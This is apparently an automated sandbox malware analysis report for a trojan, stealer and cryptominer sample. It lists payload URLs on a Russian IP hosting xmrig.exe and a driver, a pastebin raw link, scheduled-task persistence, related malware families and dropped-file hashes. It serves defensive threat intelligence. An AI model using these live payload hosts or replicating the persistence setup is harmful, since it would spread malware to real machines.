                                                                                                                        https://pragapin.sbs/rJPqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://147.45.47.81/xmrig.exePRegSvcs.exe, 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://crl.mipowershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.cloudflare.com/5xx-error-landingRegSvcs.exe, 0000001C.00000002.1722768807.0000000003108000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.000000000310C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://pragapin.sbs/rPqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://ac.ecosia.org/autocomplete?q=PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://147.45.47.81DRegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://crl.micropowershell.exe, 0000001F.00000002.1705359878.0000000008139000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgPqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zPqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uPqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://147.45.47.81/WinRing0x64.sysChttps://pastebin.com/raw/dq3hWX27Installer.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://147.45.47.81/conhost.exe.PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              		unknown
                                                                                                                                              http://usbtor.ru/viewtopic.php?t=798)ZPqSIlYOaIF.exe, 00000003.00000003.1593192466.000000000574F000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1557860288.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593149411.00000000057A0000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593257030.0000000005723000.00000004.00000800.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe, 00000009.00000002.1705015435.0000000000423000.00000002.00000001.01000000.00000006.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgPqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiPqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://pragapin.sbs/apinPqSIlYOaIF.exe, 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://pragapin.sbs/aZCA1PqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://pastebin.comRegSvcs.exe, 0000001C.00000002.1722768807.00000000030EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://pastebin.comRegSvcs.exe, 0000001C.00000002.1722768807.00000000030E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://pragapin.sbs/PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown

                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public IPs

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        172.67.19.24
                                                                                                                                                        		pastebin.comUnited States
                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                        147.45.47.81
                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                        		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                        78.47.21.153
                                                                                                                                                        		joxi.netGermany
                                                                                                                                                        		24940HETZNER-ASDEfalse
                                                                                                                                                        104.21.39.3
                                                                                                                                                        		pragapin.sbsUnited States
                                                                                                                                                        		13335CLOUDFLARENETUStrue

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                        Analysis ID:1553050
                                                                                                                                                        Start date and time:2024-11-10 09:17:09 +01:00
                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 9m 8s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                        Number of analysed new started processes analysed:42
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Sample name:PqSIlYOaIF.exe
                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                        Original Sample Name:007310a11e7dfdb4fa9dd2e216f92cda9a1954c7be76a33aaf8028206a0c0258.exe
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.spyw.evad.mine.winEXE@59/48@3/4
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 96%
                                                                                                                                                        • Number of executed functions: 20
                                                                                                                                                        • Number of non-executed functions: 20
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                        Warnings

                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        03:18:08API Interceptor8x Sleep call for process: PqSIlYOaIF.exe modified
                                                                                                                                                        03:18:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                        03:18:33API Interceptor1x Sleep call for process: Installer.exe modified
                                                                                                                                                        03:18:36API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                                                                                        03:18:39API Interceptor17x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                        08:18:39Task SchedulerRun new task: dllhost path: C:\ProgramData\Dllhost\dllhost.exe
                                                                                                                                                        08:18:39Task SchedulerRun new task: NvStrayService_bk3195 path: C:\ProgramData\Dllhost\dllhost.exe

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        172.67.19.24sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                        • pastebin.com/raw/sA04Mwk2
                                                                                                                                                        147.45.47.81Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 147.45.47.81/conhost.exe
                                                                                                                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 147.45.47.81/conhost.exe
                                                                                                                                                        inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                        • 147.45.47.81/conhost.exe
                                                                                                                                                        BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                                                                                                        CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                                                                                                        XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                                                                                                        n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                                                                                                        lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                        • 147.45.47.81/xmrig.exe
                                                                                                                                                        SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                        • 147.45.47.81/xmrig.exe
                                                                                                                                                        installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                        • 147.45.47.81/WinRing0x64.sys

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        pastebin.comERxqzVIPur.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        ERxqzVIPur.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                        • 104.20.4.235
                                                                                                                                                        segura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                        • 104.20.4.235
                                                                                                                                                        3.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.20.4.235
                                                                                                                                                        z3356_DNF_E2I36P5K_26.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        86#U041b.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        lime_single.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                        • 104.20.4.235
                                                                                                                                                        lime.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        17308799445bb8287de7df48f59c1bda103369e3b3f101fa2921985dedc6b2bd9077b91ee0277.dat-decoded.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        joxi.netinject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                        • 104.21.73.118
                                                                                                                                                        pragapin.sbskSBJ8j8jCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        WcK7T10TPc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.141.179

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        FREE-NET-ASFREEnetEUharm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.233.193.45
                                                                                                                                                        nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.233.193.45
                                                                                                                                                        nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.233.193.45
                                                                                                                                                        nsharm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.233.193.45
                                                                                                                                                        nshppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.233.193.45
                                                                                                                                                        nshmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.233.193.45
                                                                                                                                                        boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 147.45.42.138
                                                                                                                                                        boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 147.45.42.138
                                                                                                                                                        boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 147.45.42.138
                                                                                                                                                        boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 147.45.42.138
                                                                                                                                                        HETZNER-ASDEhttps://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwi2-r-EpciJAxVQ_8kDHavKJD4QFnoECBYQAQ&usg=AOvVaw0b8qPBQnhqFT1nkSOYsQHT&opi=89978449&url=amp%2Fnew.wowf.org.in%2Fphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 49.12.80.157
                                                                                                                                                        https://geett10.z6.web.core.windows.net/werrx01USAHTML/?bcda=18338461279#Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                        • 195.201.57.90
                                                                                                                                                        Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                        • 188.40.95.144
                                                                                                                                                        Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                        • 188.40.95.144
                                                                                                                                                        scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 46.4.134.23
                                                                                                                                                        scripttodo (3).ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 46.4.134.23
                                                                                                                                                        https://assets-fra.mkt.dynamics.com/899008e9-019b-ef11-8a66-6045bd6cbcf8/digitalassets/standaloneforms/eef8cd2b-b69d-ef11-a72c-000d3ae7186cGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 94.130.67.118
                                                                                                                                                        AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 144.76.190.39
                                                                                                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 85.10.196.124
                                                                                                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 85.10.196.124
                                                                                                                                                        CLOUDFLARENETUSOtherBahamas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.32.85
                                                                                                                                                        sftpc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.133.193
                                                                                                                                                        but3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        alarmer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.204.91
                                                                                                                                                        dIF7VJ7GTG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        kSBJ8j8jCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        WcK7T10TPc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.141.179
                                                                                                                                                        I25J7hpu3X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        WLItzmp3Cu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        CLOUDFLARENETUSsftpc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.133.193
                                                                                                                                                        but3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        alarmer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.204.91
                                                                                                                                                        dIF7VJ7GTG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        kSBJ8j8jCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        WcK7T10TPc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.141.179
                                                                                                                                                        I25J7hpu3X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        WLItzmp3Cu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.14.17
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                        • 104.21.23.211

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eOtherBahamas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        https://jdhcaap.succesful.org/XZFphS3Y3aTd3clF0ZnBTWTRocVM3QnZmTk13M3pEUjdRSGUyVG5TbGVIMzlFUFl5UUxSVmJXVzFuUEZ3RlgvalZwRlk2bDZoNzNyaDh1Z1VYdEZpbXVLckp1bHNjMFkxNTZSZC80UHUyZks4WU5lQ0w3TUxaSnp4eUhaaXlCWjgxZlhreUpUb0d0UWs2VUU2QXdMVXRhcFFyRWE2UG1qcTFXUnBkenN3SzBUNlBlQkdJVEhLdTJ1ME9UNEc3cFFtSGIzeHpFMTgwZWRzYXZxNy82REZhckRzRWRNZ1JnYz0tLWpwbFN2R1NyWGgyS3QrbmYtLVJjWnFLNXcvVVJpTk5KelQ1VXVmcFE9PQ==?cid=2276293354Get hashmaliciousKnowBe4Browse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                        • 172.67.19.24
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1OtherBahamas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        sftpc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        but3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        alarmer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        dIF7VJ7GTG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        kSBJ8j8jCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        WcK7T10TPc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        I25J7hpu3X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        WLItzmp3Cu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.39.3
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 104.21.39.3

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeSet-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                            C:\ProgramData\Dllhost\WinRing0x64.sysNH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                              Eulen.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                  file.exeGet hashmaliciousAmadey, XmrigBrowse
                                                                                                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                      ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                              ICBM.exeGet hashmaliciousXmrigBrowse

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\ProgramData\Dllhost\WinRing0x64.sys

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):14544
                                                                                                                                                                                Entropy (8bit):6.2660301556221185
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                Malicious:true
